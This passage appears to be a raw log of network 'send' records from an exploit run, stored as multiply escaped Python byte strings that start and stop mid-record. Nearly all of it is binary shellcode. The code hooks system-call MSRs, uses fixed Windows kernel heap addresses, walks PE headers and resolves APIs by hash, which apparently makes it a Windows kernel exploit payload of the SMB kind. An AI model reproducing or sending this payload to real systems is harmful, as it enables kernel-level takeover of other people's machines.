\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\
\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\
